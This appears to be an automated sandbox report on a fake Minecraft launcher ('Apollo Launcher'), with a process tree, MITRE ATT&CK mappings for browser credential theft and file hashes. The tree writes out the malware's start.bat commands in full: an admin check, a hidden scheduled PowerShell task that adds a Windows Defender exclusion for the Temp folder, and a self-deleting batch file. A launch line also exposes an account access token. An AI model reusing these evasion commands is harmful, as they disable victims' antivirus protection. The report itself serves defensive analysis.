  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=3364,i,11811515133686052384,11059499783949124908,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5672 /prefetch:1
  2⤵
  PID:3116
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=5804,i,11811515133686052384,11059499783949124908,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5796 /prefetch:1
  2⤵
  PID:3956
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5764,i,11811515133686052384,11059499783949124908,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5756 /prefetch:1
  2⤵
  PID:3488
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5396,i,11811515133686052384,11059499783949124908,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5372 /prefetch:8
  2⤵
  PID:2992
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5944,i,11811515133686052384,11059499783949124908,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3156 /prefetch:8
  2⤵
  PID:3516
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5388,i,11811515133686052384,11059499783949124908,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5416 /prefetch:8
  2⤵
  PID:1436
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5560,i,11811515133686052384,11059499783949124908,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5540 /prefetch:8
  2⤵
  PID:1464
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=3308,i,11811515133686052384,11059499783949124908,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5008 /prefetch:8
  2⤵
  PID:368
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=6096,i,11811515133686052384,11059499783949124908,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5676 /prefetch:8
  2⤵
  PID:4288
- C:\Users\Admin\Downloads\SKlauncher-3.2.10.exe
  "C:\Users\Admin\Downloads\SKlauncher-3.2.10.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of SetWindowsHookEx
  PID:1452
- - \??\c:\PROGRA~1\java\jre-1.8\bin\java.exe
    "c:\PROGRA~1\java\jre-1.8\bin\java.exe" -version
    3⤵
    PID:4672
- - \??\c:\PROGRA~1\java\jdk-1.8\jre\bin\java.exe
    "c:\PROGRA~1\java\jdk-1.8\jre\bin\java.exe" -version
    3⤵
    PID:1320
- - C:\Windows\SYSTEM32\reg.exe
    reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Themes\Personalize" /v AppsUseLightTheme
    3⤵
    PID:1752
- - C:\Users\Admin\AppData\Roaming\.minecraft\runtime\java-runtime-delta\bin\javaw.exe
    C:\Users\Admin\AppData\Roaming\.minecraft\runtime\java-runtime-delta\bin\javaw.exe -XshowSettings:properties -version
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Checks processor information in registry
    PID:5104
- - C:\Users\Admin\AppData\Roaming\.minecraft\runtime\minecraft-java-exe\MinecraftJava.exe
    C:\Users\Admin\AppData\Roaming\.minecraft\runtime\minecraft-java-exe\MinecraftJava.exe -Xdiag -XX:+UnlockExperimentalVMOptions -XX:+UseG1GC -XX:G1NewSizePercent=20 -XX:G1ReservePercent=20 -XX:MaxGCPauseMillis=50 -XX:G1HeapRegionSize=16M -Djava.net.preferIPv4Stack=true -Xmx4096m -javaagent:C:\Users\Admin\AppData\Roaming\.minecraft\sklauncher-fx.jar -DMcEmu=net.minecraft.client.main.Main -Dlog4j2.formatMsgNoLookups=true -Djava.rmi.server.useCodebaseOnly=true -Dcom.sun.jndi.rmi.object.trustURLCodebase=false -Dcom.sun.jndi.cosnaming.object.trustURLCodebase=false -Dsklauncher.discordrpc=true -Dsklauncher.gametype=fabric -Dsklauncher.minecraft=1.21 -XX:HeapDumpPath=MojangTricksIntelDriversForPerformance_javaw.exe_minecraft.exe.heapdump -Djava.library.path=C:\Users\Admin\AppData\Roaming\.minecraft\versions\fabric-loader-0.16.7-1.21\fabric-loader-0.16.7-1.21-natives-930977914470 -Djna.tmpdir=C:\Users\Admin\AppData\Roaming\.minecraft\versions\fabric-loader-0.16.7-1.21\fabric-loader-0.16.7-1.21-natives-930977914470 -Dorg.lwjgl.system.SharedLibraryExtractPath=C:\Users\Admin\AppData\Roaming\.minecraft\versions\fabric-loader-0.16.7-1.21\fabric-loader-0.16.7-1.21-natives-930977914470 -Dio.netty.native.workdir=C:\Users\Admin\AppData\Roaming\.minecraft\versions\fabric-loader-0.16.7-1.21\fabric-loader-0.16.7-1.21-natives-930977914470 -Dminecraft.launcher.brand=java-minecraft-launcher -Dminecraft.launcher.version=1.6.93 -cp C:\Users\Admin\AppData\Roaming\.minecraft\libraries\org\ow2\asm\asm\9.7.1\asm-9.7.1.jar;C:\Users\Admin\AppData\Roaming\.minecraft\libraries\org\ow2\asm\asm-analysis\9.7.1\asm-analysis-9.7.1.jar;C:\Users\Admin\AppData\Roaming\.minecraft\libraries\org\ow2\asm\asm-commons\9.7.1\asm-commons-9.7.1.jar;C:\Users\Admin\AppData\Roaming\.minecraft\libraries\org\ow2\asm\asm-tree\9.7.1\asm-tree-9.7.1.jar;C:\Users\Admin\AppData\Roaming\.minecraft\libraries\org\ow2\asm\asm-util\9.7.1\asm-util-9.7.1.jar;C:\Users\Admin\AppData\Roaming\.minecraft\libraries\net\fabricmc\sponge-mixin\0.15.3+mixin.0.8.7\sponge-mixin-0.15.3+mixin.0.8.7.jar;C:\Users\Admin\AppData\Roaming\.minecraft\libraries\net\fabricmc\intermediary\1.21\intermediary-1.21.jar;C:\Users\Admin\AppData\Roaming\.minecraft\libraries\net\fabricmc\fabric-loader\0.16.7\fabric-loader-0.16.7.jar;C:\Users\Admin\AppData\Roaming\.minecraft\libraries\com\github\oshi\oshi-core\6.4.10\oshi-core-6.4.10.jar;C:\Users\Admin\AppData\Roaming\.minecraft\libraries\com\google\code\gson\gson\2.10.1\gson-2.10.1.jar;C:\Users\Admin\AppData\Roaming\.minecraft\libraries\com\google\guava\failureaccess\1.0.1\failureaccess-1.0.1.jar;C:\Users\Admin\AppData\Roaming\.minecraft\libraries\com\google\guava\guava\32.1.2-jre\guava-32.1.2-jre.jar;C:\Users\Admin\AppData\Roaming\.minecraft\libraries\com\ibm\icu\icu4j\73.2\icu4j-73.2.jar;C:\Users\Admin\AppData\Roaming\.minecraft\libraries\com\mojang\authlib\6.0.54\authlib-6.0.54.jar;C:\Users\Admin\AppData\Roaming\.minecraft\libraries\com\mojang\blocklist\1.0.10\blocklist-1.0.10.jar;C:\Users\Admin\AppData\Roaming\.minecraft\libraries\com\mojang\brigadier\1.2.9\brigadier-1.2.9.jar;C:\Users\Admin\AppData\Roaming\.minecraft\libraries\com\mojang\datafixerupper\8.0.16\datafixerupper-8.0.16.jar;C:\Users\Admin\AppData\Roaming\.minecraft\libraries\com\mojang\logging\1.2.7\logging-1.2.7.jar;C:\Users\Admin\AppData\Roaming\.minecraft\libraries\com\mojang\patchy\2.2.10\patchy-2.2.10.jar;C:\Users\Admin\AppData\Roaming\.minecraft\libraries\com\mojang\text2speech\1.17.9\text2speech-1.17.9.jar;C:\Users\Admin\AppData\Roaming\.minecraft\libraries\commons-codec\commons-codec\1.16.0\commons-codec-1.16.0.jar;C:\Users\Admin\AppData\Roaming\.minecraft\libraries\commons-io\commons-io\2.15.1\commons-io-2.15.1.jar;C:\Users\Admin\AppData\Roaming\.minecraft\libraries\commons-logging\commons-logging\1.2\commons-logging-1.2.jar;C:\Users\Admin\AppData\Roaming\.minecraft\libraries\io\netty\netty-buffer\4.1.97.Final\netty-buffer-4.1.97.Final.jar;C:\Users\Admin\AppData\Roaming\.minecraft\libraries\io\netty\netty-codec\4.1.97.Final\netty-codec-4.1.97.Final.jar;C:\Users\Admin\AppData\Roaming\.minecraft\libraries\io\netty\netty-common\4.1.97.Final\netty-common-4.1.97.Final.jar;C:\Users\Admin\AppData\Roaming\.minecraft\libraries\io\netty\netty-handler\4.1.97.Final\netty-handler-4.1.97.Final.jar;C:\Users\Admin\AppData\Roaming\.minecraft\libraries\io\netty\netty-resolver\4.1.97.Final\netty-resolver-4.1.97.Final.jar;C:\Users\Admin\AppData\Roaming\.minecraft\libraries\io\netty\netty-transport-classes-epoll\4.1.97.Final\netty-transport-classes-epoll-4.1.97.Final.jar;C:\Users\Admin\AppData\Roaming\.minecraft\libraries\io\netty\netty-transport-native-unix-common\4.1.97.Final\netty-transport-native-unix-common-4.1.97.Final.jar;C:\Users\Admin\AppData\Roaming\.minecraft\libraries\io\netty\netty-transport\4.1.97.Final\netty-transport-4.1.97.Final.jar;C:\Users\Admin\AppData\Roaming\.minecraft\libraries\it\unimi\dsi\fastutil\8.5.12\fastutil-8.5.12.jar;C:\Users\Admin\AppData\Roaming\.minecraft\libraries\net\java\dev\jna\jna-platform\5.14.0\jna-platform-5.14.0.jar;C:\Users\Admin\AppData\Roaming\.minecraft\libraries\net\java\dev\jna\jna\5.14.0\jna-5.14.0.jar;C:\Users\Admin\AppData\Roaming\.minecraft\libraries\net\sf\jopt-simple\jopt-simple\5.0.4\jopt-simple-5.0.4.jar;C:\Users\Admin\AppData\Roaming\.minecraft\libraries\org\apache\commons\commons-compress\1.26.0\commons-compress-1.26.0.jar;C:\Users\Admin\AppData\Roaming\.minecraft\libraries\org\apache\commons\commons-lang3\3.14.0\commons-lang3-3.14.0.jar;C:\Users\Admin\AppData\Roaming\.minecraft\libraries\org\apache\httpcomponents\httpclient\4.5.13\httpclient-4.5.13.jar;C:\Users\Admin\AppData\Roaming\.minecraft\libraries\org\apache\httpcomponents\httpcore\4.4.16\httpcore-4.4.16.jar;C:\Users\Admin\AppData\Roaming\.minecraft\libraries\org\apache\logging\log4j\log4j-api\2.22.1\log4j-api-2.22.1.jar;C:\Users\Admin\AppData\Roaming\.minecraft\libraries\org\apache\logging\log4j\log4j-core\2.22.1\log4j-core-2.22.1.jar;C:\Users\Admin\AppData\Roaming\.minecraft\libraries\org\apache\logging\log4j\log4j-slf4j2-impl\2.22.1\log4j-slf4j2-impl-2.22.1.jar;C:\Users\Admin\AppData\Roaming\.minecraft\libraries\org\jcraft\jorbis\0.0.17\jorbis-0.0.17.jar;C:\Users\Admin\AppData\Roaming\.minecraft\libraries\org\joml\joml\1.10.5\joml-1.10.5.jar;C:\Users\Admin\AppData\Roaming\.minecraft\libraries\org\lwjgl\lwjgl-freetype\3.3.3\lwjgl-freetype-3.3.3.jar;C:\Users\Admin\AppData\Roaming\.minecraft\libraries\org\lwjgl\lwjgl-freetype\3.3.3\lwjgl-freetype-3.3.3-natives-windows.jar;C:\Users\Admin\AppData\Roaming\.minecraft\libraries\org\lwjgl\lwjgl-freetype\3.3.3\lwjgl-freetype-3.3.3-natives-windows-arm64.jar;C:\Users\Admin\AppData\Roaming\.minecraft\libraries\org\lwjgl\lwjgl-freetype\3.3.3\lwjgl-freetype-3.3.3-natives-windows-x86.jar;C:\Users\Admin\AppData\Roaming\.minecraft\libraries\org\lwjgl\lwjgl-glfw\3.3.3\lwjgl-glfw-3.3.3.jar;C:\Users\Admin\AppData\Roaming\.minecraft\libraries\org\lwjgl\lwjgl-glfw\3.3.3\lwjgl-glfw-3.3.3-natives-windows.jar;C:\Users\Admin\AppData\Roaming\.minecraft\libraries\org\lwjgl\lwjgl-glfw\3.3.3\lwjgl-glfw-3.3.3-natives-windows-arm64.jar;C:\Users\Admin\AppData\Roaming\.minecraft\libraries\org\lwjgl\lwjgl-glfw\3.3.3\lwjgl-glfw-3.3.3-natives-windows-x86.jar;C:\Users\Admin\AppData\Roaming\.minecraft\libraries\org\lwjgl\lwjgl-jemalloc\3.3.3\lwjgl-jemalloc-3.3.3.jar;C:\Users\Admin\AppData\Roaming\.minecraft\libraries\org\lwjgl\lwjgl-jemalloc\3.3.3\lwjgl-jemalloc-3.3.3-natives-windows.jar;C:\Users\Admin\AppData\Roaming\.minecraft\libraries\org\lwjgl\lwjgl-jemalloc\3.3.3\lwjgl-jemalloc-3.3.3-natives-windows-arm64.jar;C:\Users\Admin\AppData\Roaming\.minecraft\libraries\org\lwjgl\lwjgl-jemalloc\3.3.3\lwjgl-jemalloc-3.3.3-natives-windows-x86.jar;C:\Users\Admin\AppData\Roaming\.minecraft\libraries\org\lwjgl\lwjgl-openal\3.3.3\lwjgl-openal-3.3.3.jar;C:\Users\Admin\AppData\Roaming\.minecraft\libraries\org\lwjgl\lwjgl-openal\3.3.3\lwjgl-openal-3.3.3-natives-windows.jar;C:\Users\Admin\AppData\Roaming\.minecraft\libraries\org\lwjgl\lwjgl-openal\3.3.3\lwjgl-openal-3.3.3-natives-windows-arm64.jar;C:\Users\Admin\AppData\Roaming\.minecraft\libraries\org\lwjgl\lwjgl-openal\3.3.3\lwjgl-openal-3.3.3-natives-windows-x86.jar;C:\Users\Admin\AppData\Roaming\.minecraft\libraries\org\lwjgl\lwjgl-opengl\3.3.3\lwjgl-opengl-3.3.3.jar;C:\Users\Admin\AppData\Roaming\.minecraft\libraries\org\lwjgl\lwjgl-opengl\3.3.3\lwjgl-opengl-3.3.3-natives-windows.jar;C:\Users\Admin\AppData\Roaming\.minecraft\libraries\org\lwjgl\lwjgl-opengl\3.3.3\lwjgl-opengl-3.3.3-natives-windows-arm64.jar;C:\Users\Admin\AppData\Roaming\.minecraft\libraries\org\lwjgl\lwjgl-opengl\3.3.3\lwjgl-opengl-3.3.3-natives-windows-x86.jar;C:\Users\Admin\AppData\Roaming\.minecraft\libraries\org\lwjgl\lwjgl-stb\3.3.3\lwjgl-stb-3.3.3.jar;C:\Users\Admin\AppData\Roaming\.minecraft\libraries\org\lwjgl\lwjgl-stb\3.3.3\lwjgl-stb-3.3.3-natives-windows.jar;C:\Users\Admin\AppData\Roaming\.minecraft\libraries\org\lwjgl\lwjgl-stb\3.3.3\lwjgl-stb-3.3.3-natives-windows-arm64.jar;C:\Users\Admin\AppData\Roaming\.minecraft\libraries\org\lwjgl\lwjgl-stb\3.3.3\lwjgl-stb-3.3.3-natives-windows-x86.jar;C:\Users\Admin\AppData\Roaming\.minecraft\libraries\org\lwjgl\lwjgl-tinyfd\3.3.3\lwjgl-tinyfd-3.3.3.jar;C:\Users\Admin\AppData\Roaming\.minecraft\libraries\org\lwjgl\lwjgl-tinyfd\3.3.3\lwjgl-tinyfd-3.3.3-natives-windows.jar;C:\Users\Admin\AppData\Roaming\.minecraft\libraries\org\lwjgl\lwjgl-tinyfd\3.3.3\lwjgl-tinyfd-3.3.3-natives-windows-arm64.jar;C:\Users\Admin\AppData\Roaming\.minecraft\libraries\org\lwjgl\lwjgl-tinyfd\3.3.3\lwjgl-tinyfd-3.3.3-natives-windows-x86.jar;C:\Users\Admin\AppData\Roaming\.minecraft\libraries\org\lwjgl\lwjgl\3.3.3\lwjgl-3.3.3.jar;C:\Users\Admin\AppData\Roaming\.minecraft\libraries\org\lwjgl\lwjgl\3.3.3\lwjgl-3.3.3-natives-windows.jar;C:\Users\Admin\AppData\Roaming\.minecraft\libraries\org\lwjgl\lwjgl\3.3.3\lwjgl-3.3.3-natives-windows-arm64.jar;C:\Users\Admin\AppData\Roaming\.minecraft\libraries\org\lwjgl\lwjgl\3.3.3\lwjgl-3.3.3-natives-windows-x86.jar;C:\Users\Admin\AppData\Roaming\.minecraft\libraries\org\lz4\lz4-java\1.8.0\lz4-java-1.8.0.jar;C:\Users\Admin\AppData\Roaming\.minecraft\libraries\org\slf4j\slf4j-api\2.0.9\slf4j-api-2.0.9.jar;C:\Users\Admin\AppData\Roaming\.minecraft\versions\fabric-loader-0.16.7-1.21\fabric-loader-0.16.7-1.21.jar "-DFabricMcEmu= net.minecraft.client.main.Main " net.fabricmc.loader.impl.launch.knot.KnotClient --username ReAle --version fabric-loader-0.16.7-1.21 --gameDir C:\Users\Admin\AppData\Roaming\.minecraft --assetsDir C:\Users\Admin\AppData\Roaming\.minecraft\assets --assetIndex 17 --uuid 8639502aea7d3b75a776157b7c7335d1 --accessToken 8c90cbcdabb348e0bed183ac489c32f4 --clientId 0 --xuid 0 --userType msa --versionType release --width 854 --height 480
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Loads dropped DLL
    - Checks processor information in registry
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of SetWindowsHookEx
    PID:2276
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=4796,i,11811515133686052384,11059499783949124908,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5836 /prefetch:8
  2⤵
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  PID:3260

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:3000

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:4612

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
PID:12708

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\Apollo_Launcher\start.bat" "
1⤵
PID:13480
- C:\Windows\system32\net.exe
  net session
  2⤵
  PID:13536
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 session
    3⤵
    PID:13552
- C:\Windows\system32\schtasks.exe
  schtasks /query /tn "AddDefenderExclusionTask"
  2⤵
  PID:13576
- C:\Windows\system32\schtasks.exe
  schtasks /create /tn "AddDefenderExclusionTask" /tr "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'" /sc once /st 00:00 /rl highest /f
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:13592
- C:\Windows\system32\schtasks.exe
  schtasks /run /tn "AddDefenderExclusionTask"
  2⤵
  PID:13608
- C:\Windows\system32\timeout.exe
  timeout /t 3 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:13644
- C:\Windows\system32\schtasks.exe
  schtasks /delete /tn "AddDefenderExclusionTask" /f
  2⤵
  PID:13840
- C:\Program Files (x86)\Common Files\Oracle\Java\javapath\java.exe
  java -jar Apollo.jar
  2⤵
  - Suspicious use of SetWindowsHookEx
  PID:13856
- - C:\Users\Admin\AppData\Local\Temp\Minecraft_Client_1.21.1\Minecraft_Client_1.21.1.exe
    C:\Users\Admin\AppData\Local\Temp\Minecraft_Client_1.21.1\Minecraft_Client_1.21.1.exe
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Loads dropped DLL
    - Checks processor information in registry
    - Suspicious behavior: EnumeratesProcesses
    PID:14296
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp812F.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp812F.tmp.bat
      4⤵
      PID:5232

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:13636

C:\Windows\System32\NOTEPAD.EXE
"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\Desktop\Apollo_Launcher\start.bat
1⤵
- Opens file in notepad (likely ransom note)
PID:5472

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
PID:5884

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
PID:416

C:\Users\Admin\Downloads\SKlauncher-3.2.10.exe
"C:\Users\Admin\Downloads\SKlauncher-3.2.10.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:3028
- C:\Windows\SYSTEM32\reg.exe
  reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Themes\Personalize" /v AppsUseLightTheme
  2⤵
  PID:8364

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\Apollo_Launcher\start.bat" "
1⤵
PID:7164
- C:\Windows\system32\net.exe
  net session
  2⤵
  PID:7132
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 session
    3⤵
    PID:3548
- C:\Windows\system32\schtasks.exe
  schtasks /query /tn "AddDefenderExclusionTask"
  2⤵
  PID:7092
- C:\Windows\system32\schtasks.exe
  schtasks /create /tn "AddDefenderExclusionTask" /tr "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'" /sc once /st 00:00 /rl highest /f
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:232
- C:\Windows\system32\schtasks.exe
  schtasks /run /tn "AddDefenderExclusionTask"
  2⤵
  PID:4496
- C:\Windows\system32\timeout.exe
  timeout /t 3 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:4232
- C:\Windows\system32\schtasks.exe
  schtasks /delete /tn "AddDefenderExclusionTask" /f
  2⤵
  PID:5336
- C:\Program Files (x86)\Common Files\Oracle\Java\javapath\java.exe
  java -jar Apollo.jar
  2⤵
  - Suspicious use of SetWindowsHookEx
  PID:2760
- - C:\Users\Admin\AppData\Local\Temp\Minecraft_Client_1.21.1\Minecraft_Client_1.21.1.exe
    C:\Users\Admin\AppData\Local\Temp\Minecraft_Client_1.21.1\Minecraft_Client_1.21.1.exe
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    PID:10688

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2548

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
PID:11468

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\.minecraft\versions\fabric-loader-0.16.7-1.21\client.txt
1⤵
PID:11624

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Network Share Discovery

T1135

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\447eeef1-1807-49f4-896e-cba5c9e6b9a7.tmp

Filesize
10KB

MD5
5474b99baa8bbb1478c65b819f60f43d

SHA1
74779079c3f92903ce5afc814b1ccda578efa022

SHA256
8877fd76630d4be4d5e9e306f1990c9958be937cd8018e51a56981174d205d60

SHA512
9edc82b36f8d2d6bd170cbd3c08058a6bfe24f758453f78877d7077628256c603568deee99d83e97383345312ba57d498d6de8bc5f0ddbed8ca3857de8f72d22

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
b4ee75c66ef53f19abc5e0c4e12bb21f

SHA1
92cd9a4f12fa0fcb110164d93071cef28599ce31

SHA256
b893065a1df2412c0c42f917ca31348a6d7837b71a25c264cda26a8058183b1a

SHA512
f42776fbf9ee76b778929950c3983033f184375814c52c3a8d52ea116ee95047565878877a5231c1dcf4185095360a36e8bdefc42182c0e63060e48360a93c97

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00002c

Filesize
1.6MB

MD5
ebb40145a6bfbed88859e41689315d82

SHA1
7bb2c82ef24ef919d04592930bceae039f78aebf

SHA256
e4baeaa3c58628acfd7058b9d434ab2e6a7400445f55685169a79f045810298c

SHA512
67c6601bed14363e6850d93cf2b90c1e4f69c7cd5098d548aa0f378fb42dc6e32fe52cb81aeb232a365a3edb24fdc6ef46f6400cf1709e1d5ee22fa4ac4e07ae

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
1KB

MD5
eeeef526ab46a3325e52feb7a9e52312

SHA1
e40cff274e4c5cee1c5117f5feb1b24a56bf5713

SHA256
3e0270bd2587ffc3e96ca2f4e2d5f648054ad954444ac3f9c5cb2d203c15ccd6

SHA512
623bd16f79315056ce7fb41bc2dfd7ce671cae3b0c1ef10d62b8096ded5671c5430fe5bc1d7ce14b3d726021ec6db20b4335031a28208371ab62f55f2f455d54

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
9KB

MD5
2f79f196e1556a86d998fff828838be3

SHA1
d5d94a98d2b0caa8a89ddb72a4abf80bec91ad94

SHA256
dd902dc2c8487584200889372d76689859926aa691ae7b9caf86eab4fbec3b7c

SHA512
c686ddf7fe871cdc2059f61dbc9a9cfb3dd684e64bafddb70add7c4765580c29750c4dcf18589224bb6f11f537a2b256f04c310f404a40bfb8057ad7e0f67fec

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
356B

MD5
f352784d4863d5c794cc5712afc4e7c7

SHA1
87cd1766cb63064ae759aab15a0dd65bab1466ad

SHA256
b727ee6f1ed328e680782747ad47a32c61e31a72551069c93944f60779da7e8e

SHA512
d756da85b48d6f243d985a7c798ab12b10be8952f3669a0ac607be4a6e23c20fcef1f5bf47050c30a9043af9eecf8e61420d227472b4527badf4df9a208438e9

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
a5c4f2a3389de87351d46d371a5fe210

SHA1
eb309388c0dfb134df798eb5a6efc157c1289539

SHA256
24b9e1c4ae5b82c753450fa9fed6631e50f418a0bb1f228a4cadb1c8210de918

SHA512
3f324544b2b135edfbdfa7e4ca8c51af82cb1bc601d01433c99b207bd8a5a9c18126ff1d806824f765e7b50b2951fba59904c1bbd5c25b6e566b1aeaa03e662e

Download Submit
